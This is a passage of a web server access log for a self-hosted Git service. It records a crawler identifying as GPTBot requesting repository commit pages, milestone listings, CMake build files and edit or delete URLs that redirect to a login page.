"https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" +[17/Feb/2026:15:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2ffallback_http_error.log" [Client 74.7.227.38] [Length 21838] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:42:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" +[17/Feb/2026:15:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/database.sqlite" +[17/Feb/2026:15:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2ffallback_http_access.log" [Client 74.7.227.38] [Length 28017] [Gzip 6.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" +[17/Feb/2026:15:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12764] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" +[17/Feb/2026:15:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" +[17/Feb/2026:15:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14257] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:15:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8511] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=mostcomplete&state=open" +[17/Feb/2026:15:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastcomplete&state=all" [Client 74.7.227.38] [Length 8488] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=leastcomplete&state=open" +[17/Feb/2026:15:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8502] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=mostissues&state=open" +[17/Feb/2026:15:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8502] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=leastissues&state=open" +[17/Feb/2026:15:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=leastcomplete&state=open" +[17/Feb/2026:15:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" [Client 74.7.227.38] [Length 16488] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" +[17/Feb/2026:15:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13448] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" +[17/Feb/2026:15:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15201] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15382] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" +[17/Feb/2026:15:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10567] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8507] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" +[17/Feb/2026:15:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8505] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" +[17/Feb/2026:15:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8515] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" +[17/Feb/2026:15:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8504] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" +[17/Feb/2026:15:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8498] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" +[17/Feb/2026:15:42:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:15:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker" +[17/Feb/2026:15:42:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:15:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker" +[17/Feb/2026:15:42:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:15:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker" +[17/Feb/2026:15:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15159] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:15:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15112] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15113] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:42:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:15:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/README.md" +[17/Feb/2026:15:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:15:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13718] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13720] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:42:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/start.sh" +[17/Feb/2026:15:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9977] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21634] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21633] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15366] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr 